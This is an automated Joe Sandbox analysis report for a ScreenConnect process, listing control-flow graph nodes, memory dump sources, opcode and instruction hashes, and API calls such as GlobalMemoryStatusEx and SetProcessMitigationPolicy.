                                                                                                                                                                                control_flow_graph 1559 7ff849237f2b-7ff849237f3e call 7ff849234340 1562 7ff849237f45-7ff849237f54 1559->1562 1564 7ff849237f5a-7ff849237f65 1562->1564 1565 7ff84923806d-7ff849238078 1562->1565 1564->1565 1567 7ff849237f6b-7ff849237f7d 1564->1567 1568 7ff849237fc9-7ff849237fef 1567->1568 1569 7ff849237f7f-7ff849237f9c 1567->1569 1575 7ff849237ff0-7ff84923800c 1568->1575 1572 7ff849238079-7ff849238089 1569->1572 1573 7ff849237fa2-7ff849237fc7 1569->1573 1578 7ff84923808b 1572->1578 1579 7ff849238091 1572->1579 1573->1568 1588 7ff849238061-7ff849238063 1575->1588 1578->1579 1582 7ff849238093 1579->1582 1583 7ff849238095-7ff8492380bb 1579->1583 1582->1583 1586 7ff8492380d5-7ff8492380e0 1582->1586 1583->1588 1593 7ff8492380bd-7ff8492380d2 1583->1593 1590 7ff8492380e4-7ff849238135 1588->1590 1591 7ff849238065-7ff849238069 1588->1591 1596 7ff84923817d-7ff84923819b 1590->1596 1597 7ff849238137-7ff849238142 1590->1597 1591->1565 1591->1575 1593->1586 1597->1596
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: P"I
                                                                                                                                                                                • API String ID: 0-938309057
                                                                                                                                                                                • Opcode ID: 677989349884b47904237985626a8017970057f6ac23d5ef4d593f68466d969d
                                                                                                                                                                                • Instruction ID: e6729daf1465b029711fd911c5477f400e5bcd4e4535a605cb39d6dae81ac339
                                                                                                                                                                                • Opcode Fuzzy Hash: 677989349884b47904237985626a8017970057f6ac23d5ef4d593f68466d969d
                                                                                                                                                                                • Instruction Fuzzy Hash: F2511331D1EADA4FF7B9AB3858555B53BE0FF65740B1800BBC05DCB187EE19A8458381
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4fb91a9e04cdea57649570ee111210bd80013b5a26d87c4ab7c7a900ddd93543
                                                                                                                                                                                • Instruction ID: 1e34c4a4d6dc9fb1670c2ce331599e4f6b21d653dec86293ed91a6168c2d2582
                                                                                                                                                                                • Opcode Fuzzy Hash: 4fb91a9e04cdea57649570ee111210bd80013b5a26d87c4ab7c7a900ddd93543
                                                                                                                                                                                • Instruction Fuzzy Hash: B2B1B53560DA964FE7ECEF28D0906E177A1FF55354B2405BAC06DCF187CA29E846C780
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 121da0426b24a41757b64e4f4701d1e6b7c26909c2137e013ab3df772cd129eb
                                                                                                                                                                                • Instruction ID: 56285fe381e1064242d6ba5456234a81f2996b7852932ba2a8202fcde4310dc4
                                                                                                                                                                                • Opcode Fuzzy Hash: 121da0426b24a41757b64e4f4701d1e6b7c26909c2137e013ab3df772cd129eb
                                                                                                                                                                                • Instruction Fuzzy Hash: DD719231E1C96B4EF7B9FF3494566B962D6FF98384F50043AC02EC32C1DE29B9068644
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a35776e3b9ace2d8d53684eb5f25247e4ec677a752a4d43a4ed30438010eeec7
                                                                                                                                                                                • Instruction ID: 53fdde18e70ddfba54f127b7c9da61e1ee39849ac0463df3faaaec268a8f7330
                                                                                                                                                                                • Opcode Fuzzy Hash: a35776e3b9ace2d8d53684eb5f25247e4ec677a752a4d43a4ed30438010eeec7
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D512532D0D9DA8FFB75FB38A8550B97BE1EF94380F04017AD15C8B692DF29A8468341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8889fe8320feb9916d751458f85908450fb38e895bfe770417b09db43750b9f
                                                                                                                                                                                • Instruction ID: 7e282a101066a8f17db1f467f72f7163ff7cec57272813d9242cc45895ef00d8
                                                                                                                                                                                • Opcode Fuzzy Hash: d8889fe8320feb9916d751458f85908450fb38e895bfe770417b09db43750b9f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F213A3190DBD94FE7B5AB3598140A67BF1FF85360B0801BBD09DCB592DB2CA846C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5bd1736d3bbd89dbb0b81832ce01a76f92bc2a9f382bdc870b02b6e01f804a05
                                                                                                                                                                                • Instruction ID: 3d909b7246fb0a00d4e50ae5717f9043b180cc19d00616dea9a0ac1a3d57c362
                                                                                                                                                                                • Opcode Fuzzy Hash: 5bd1736d3bbd89dbb0b81832ce01a76f92bc2a9f382bdc870b02b6e01f804a05
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A21D23281E5E59EF761FB3CA8924E67760EF0139CF0802B7D09D8D093EE1D78458649
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0f49366332333a000995cad4c4f8d98c913e62d09f2ee18bc41407bfa571c358
                                                                                                                                                                                • Instruction ID: 1fe8a716aebee8682951221692a4522dc93ebd257d20e76b0d2e83ef3f868a23
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f49366332333a000995cad4c4f8d98c913e62d09f2ee18bc41407bfa571c358
                                                                                                                                                                                • Instruction Fuzzy Hash: A221D332C0D5E59FF765FF3CA8928E67B60EF013A9B0901B7D09D8A093EE1D78458645
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c4ffe36d3d73e13c5e8a2345d44beb9d91c8c8fd253257a9a2a70f802df4bceb
                                                                                                                                                                                • Instruction ID: 52fe6984d6fb3b19a208cf393c166882cd9c2cad8684352855b19593ac21c5f2
                                                                                                                                                                                • Opcode Fuzzy Hash: c4ffe36d3d73e13c5e8a2345d44beb9d91c8c8fd253257a9a2a70f802df4bceb
                                                                                                                                                                                • Instruction Fuzzy Hash: 21117821E1D9970FF7A9BB3C24915A52BE2EFA925071841BBC00CC719BDD2C9C46C390
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6cf72708c7e28f9986115ac38064085a4bda0d8a888c99711c1c328e271dddfe
                                                                                                                                                                                • Instruction ID: 3e08cbff78063bf008a4b5f1ec73a06b242f18481f7a5b1c9cd1de24d3b1379f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cf72708c7e28f9986115ac38064085a4bda0d8a888c99711c1c328e271dddfe
                                                                                                                                                                                • Instruction Fuzzy Hash: 76116033F0DD9A8EFBB9AB786C251F93692EF44384F0401BBD12DC71D2DE18A8418285
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d1a70afa0b22fd9d9ed97f7c146e719bfe026410eb7d6c40b906d850ed8179fb
                                                                                                                                                                                • Instruction ID: e86b6273a5cebcfebd08fb6eb12155e7b05eadf65a788076f41171fd8d20c93a
                                                                                                                                                                                • Opcode Fuzzy Hash: d1a70afa0b22fd9d9ed97f7c146e719bfe026410eb7d6c40b906d850ed8179fb
                                                                                                                                                                                • Instruction Fuzzy Hash: 3611D03060D9184FFBA4EA28D458A72B3D1FBD8355F14017FD84DC32A1DE259840C700
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0ca863cbdf5605f6233aec8c883eb28c35932d4102df70207481597347b263e9
                                                                                                                                                                                • Instruction ID: 1b3bd5e6894a1154f23b3d5adfa285e09cf2aaa09ff9f156c51ca89f9b4e5dac
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca863cbdf5605f6233aec8c883eb28c35932d4102df70207481597347b263e9
                                                                                                                                                                                • Instruction Fuzzy Hash: E811D376E0DA8A8FEBB5EF749C654A83FA0FF55300F4500AAD06DC3296DA246801C701
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3948c0e164aa37366195b1c82c2df30eadda80ec2dd408e32bf56fbf359f4033
                                                                                                                                                                                • Instruction ID: d498d4d48ae0b42e9056fda738a52aeea821caf2b340cdac187452499f24eb36
                                                                                                                                                                                • Opcode Fuzzy Hash: 3948c0e164aa37366195b1c82c2df30eadda80ec2dd408e32bf56fbf359f4033
                                                                                                                                                                                • Instruction Fuzzy Hash: 33118E3044E7C8AFD747AB74C8249953FB4EF8725070A41E7E089CB1B3C6299D1AC7A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c557632a898375ef406b46e33f4f237e13354655c2c86b9198ec1f201874ea99
                                                                                                                                                                                • Instruction ID: 2e262468ce805b8f4e6ebd4b3871f515e74a8dd8f65c63fc6d86ef7636ba7a1f
                                                                                                                                                                                • Opcode Fuzzy Hash: c557632a898375ef406b46e33f4f237e13354655c2c86b9198ec1f201874ea99
                                                                                                                                                                                • Instruction Fuzzy Hash: 80012D21E5EC5B1EF7B8BF3C24D55BA16E2EFA8180B544176D40DC719BDD2DD8418390
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bae656384783a9cf3a0cb2ebad45d4de481ca5d25db8873c9e1727f62302c836
                                                                                                                                                                                • Instruction ID: cefdcce89c52aad22971f7706a18a966b1acb1807059eb3690f8124e36cbeea8
                                                                                                                                                                                • Opcode Fuzzy Hash: bae656384783a9cf3a0cb2ebad45d4de481ca5d25db8873c9e1727f62302c836
                                                                                                                                                                                • Instruction Fuzzy Hash: DA11E024A0DEE30EF779AB7988643752AE2EF95380F0880FBC45DC61E6DD5CAC818701
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3bc1686cd06bb32d0308d93df48b33e2a742666200dbeb11ce357ef752a078a7
                                                                                                                                                                                • Instruction ID: c7aeab9849913cef2b5e92c98dd5c6bcf099970739f8b061acf5745fb5b14e35
                                                                                                                                                                                • Opcode Fuzzy Hash: 3bc1686cd06bb32d0308d93df48b33e2a742666200dbeb11ce357ef752a078a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 21116031A0C99A8FEAA8EF288041B6577A1FF64744F1445E9C45ECB287DE29EC458790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6de04231c4c150562ded3f6ff30eb91cd0876b56b1fff1ca6e5b4ddc8295bbf
                                                                                                                                                                                • Instruction ID: b2f5f55e7f61905d154a9cd3693c6db2e928e8046a6c3a38d0cdb245caee3f9d
                                                                                                                                                                                • Opcode Fuzzy Hash: a6de04231c4c150562ded3f6ff30eb91cd0876b56b1fff1ca6e5b4ddc8295bbf
                                                                                                                                                                                • Instruction Fuzzy Hash: B1118231A0C9964FEAA8EF28C041B6577E1FF54744F0441E9C44DCB287DE39EC058780
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 92d5cd7d05bf398291b890e74592b990b19fa891e63c1c93bf8fc64befe33cdd
                                                                                                                                                                                • Instruction ID: 25856892ed24c3d1ad95bd48d6d9ebf8ceba2b40b62fbd4f82093e9b40723aa9
                                                                                                                                                                                • Opcode Fuzzy Hash: 92d5cd7d05bf398291b890e74592b990b19fa891e63c1c93bf8fc64befe33cdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 75F0A03141D68C9FCB42EB64D4908D6BF70FF06325B1401CBE04CCB052E7218A49CB82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 22bc8ba669cbd238bc198d740bd7770de527132fd23bd0311038c49d31d9f600
                                                                                                                                                                                • Instruction ID: 72d9a0da1ddcd35a811a08729a61d413ee1bcb904d1d78549fbeee64800d7a5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 22bc8ba669cbd238bc198d740bd7770de527132fd23bd0311038c49d31d9f600
                                                                                                                                                                                • Instruction Fuzzy Hash: 63E06D7190E7D54FD756DB3484A88E57F60AE1322131900EFD4858F0A3E5158989C752
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 696aa68bcc353994caa201eb86fdf266b1603f8696b018aa9cc77afef9418886
                                                                                                                                                                                • Instruction ID: 42b2f3bc9b03f450e78ddc9a0df64d389de9527d76476b6582f6eb61d0694f78
                                                                                                                                                                                • Opcode Fuzzy Hash: 696aa68bcc353994caa201eb86fdf266b1603f8696b018aa9cc77afef9418886
                                                                                                                                                                                • Instruction Fuzzy Hash: FDE0C22995DE630AFB7C3AB6B9913B660C1DF053D1F0980BB942DC00C5DD9CDCC08955
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a7006b556e69f2d1da25beb5652c5a284bf9652784f78e0c2e325764d48b961a
                                                                                                                                                                                • Instruction ID: 86742f31c3ab10a5f7e5f205a2a1abbde34395978377f5f4cc70d3d486e544d6
                                                                                                                                                                                • Opcode Fuzzy Hash: a7006b556e69f2d1da25beb5652c5a284bf9652784f78e0c2e325764d48b961a
                                                                                                                                                                                • Instruction Fuzzy Hash: B6C04812B5A86D0A95E4B25C38452A986C2E788AA1B8905B2E80CC728AE9084CC213C2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                • Instruction ID: d2a9e2b245e8e990972714b30d08e0d846b2f03329c6548106302e3a0631e641
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                • Instruction Fuzzy Hash: FCC09B20E1C5564EF154FF34544117D11526FCC240F504435D01D851C7CF3DB5015649
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.3910259758.00007FF849230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849230000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff849230000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                • Instruction ID: 50030d17c2ff5e126855075caa863da81f311e2beeb8978d77648c2946bbb42a
                                                                                                                                                                                • Opcode Fuzzy Hash: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                • Instruction Fuzzy Hash: 46A00210E4D9664DF0717A24110117D04410F94690F204176D11E852C6DE1DAE42129A

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:13.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:10
                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                execution_graph 15473 7ff849258d94 15476 7ff849258d9d 15473->15476 15474 7ff849258f39 GlobalMemoryStatusEx 15475 7ff849258f65 15474->15475 15476->15474 15477 7ff849258e98 15476->15477 15468 7ff848f48014 15470 7ff848f4801d 15468->15470 15469 7ff848f48082 15470->15469 15471 7ff848f480f6 SetProcessMitigationPolicy 15470->15471 15472 7ff848f48152 15471->15472

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1102 7ff849258d94-7ff849258d9b 1103 7ff849258d9d-7ff849258da5 1102->1103 1104 7ff849258da6-7ff849258e0a 1102->1104 1103->1104 1107 7ff849258e0c-7ff849258e35 1104->1107 1108 7ff849258e54-7ff849258e66 1104->1108 1110 7ff849258e8e 1107->1110 1111 7ff849258e37-7ff849258e3a 1107->1111 1115 7ff849258e68-7ff849258e6d 1108->1115 1116 7ff849258ee2-7ff849258eec 1108->1116 1114 7ff849258e8f 1110->1114 1112 7ff849258e3c-7ff849258e3e 1111->1112 1113 7ff849258ebb-7ff849258ebf 1111->1113 1117 7ff849258eba 1112->1117 1118 7ff849258e40 1112->1118 1134 7ff849258ec0 1113->1134 1119 7ff849258f0b-7ff849258f0e 1114->1119 1120 7ff849258e90 1114->1120 1121 7ff849258e6f-7ff849258e71 1115->1121 1122 7ff849258eee-7ff849258eef 1115->1122 1123 7ff849258eed 1116->1123 1117->1113 1125 7ff849258e83 1118->1125 1126 7ff849258e42-7ff849258e44 1118->1126 1127 7ff849258f11-7ff849258f37 1119->1127 1120->1127 1128 7ff849258e91 1120->1128 1121->1123 1129 7ff849258e73-7ff849258e77 1121->1129 1130 7ff849258f39-7ff849258f63 GlobalMemoryStatusEx 1122->1130 1131 7ff849258ef0-7ff849258ef1 1122->1131 1123->1122 1132 7ff849258eff-7ff849258f03 1125->1132 1133 7ff849258e85 1125->1133 1126->1134 1135 7ff849258e46 1126->1135 1127->1130 1139 7ff849258ed3-7ff849258edf 1128->1139 1140 7ff849258e92-7ff849258e96 1128->1140 1141 7ff849258e79 1129->1141 1142 7ff849258ef3-7ff849258ef8 1129->1142 1137 7ff849258f6b-7ff849258f92 1130->1137 1138 7ff849258f65 1130->1138 1131->1142 1143 7ff849258f05-7ff849258f0a 1132->1143 1144 7ff849258ec7-7ff849258ec9 1133->1144 1145 7ff849258e86-7ff849258e87 1133->1145 1146 7ff849258e89 1135->1146 1147 7ff849258e48-7ff849258e4a 1135->1147 1138->1137 1139->1116 1149 7ff849258e98-7ff849258eb9 1140->1149 1150 7ff849258ecb-7ff849258ece 1140->1150 1141->1113 1151 7ff849258e7b-7ff849258e7d 1141->1151 1152 7ff849258ef9-7ff849258efe 1142->1152 1143->1119 1144->1150 1154 7ff849258ecf 1144->1154 1145->1146 1146->1143 1153 7ff849258e8b-7ff849258e8d 1146->1153 1155 7ff849258e4c 1147->1155 1156 7ff849258ec6 1147->1156 1149->1117 1150->1154 1151->1152 1157 7ff849258e7f-7ff849258e81 1151->1157 1152->1132 1153->1110 1158 7ff849258ed1 1154->1158 1159 7ff849258ed2 1154->1159 1155->1114 1160 7ff849258e4e-7ff849258e51 1155->1160 1156->1144 1157->1125 1158->1159 1159->1139 1160->1108
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.2535827354.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff849250000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                                                                • Opcode ID: 15a42ca25e68da1dc8bf9c705f66a898102fb44f9be28cd937afad73df14401d
                                                                                                                                                                                • Instruction ID: 7fd8e953e0e7ae36ab8bec1e7c54e2a0115dfeebb084d411eb840e0d6a5f20eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 15a42ca25e68da1dc8bf9c705f66a898102fb44f9be28cd937afad73df14401d
                                                                                                                                                                                • Instruction Fuzzy Hash: AF812431C0D6D98FF775EB6858056B9BFE0EF56360F0881BAE05CC7593DAA8680A8741

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.2533314715.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: 52ab1e3d8754e2a7d4d25e9dcbceb077c05a53a4dbb3b04324c93a78b9ded402
                                                                                                                                                                                • Instruction ID: 8f48142ba402de73707b82593583376dad4906e2273a459a8cc968bcc6832430
                                                                                                                                                                                • Opcode Fuzzy Hash: 52ab1e3d8754e2a7d4d25e9dcbceb077c05a53a4dbb3b04324c93a78b9ded402
                                                                                                                                                                                • Instruction Fuzzy Hash: 0441563191CB488FEB14AFA89C4A5E97BF0EF65750F00017FE049C3292DF68A846CB95

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1365 7ff848f43aa2-7ff848f480ef 1367 7ff848f480f6-7ff848f48150 SetProcessMitigationPolicy 1365->1367 1368 7ff848f48158-7ff848f48187 1367->1368 1369 7ff848f48152 1367->1369 1369->1368
                                                                                                                                                                                APIs
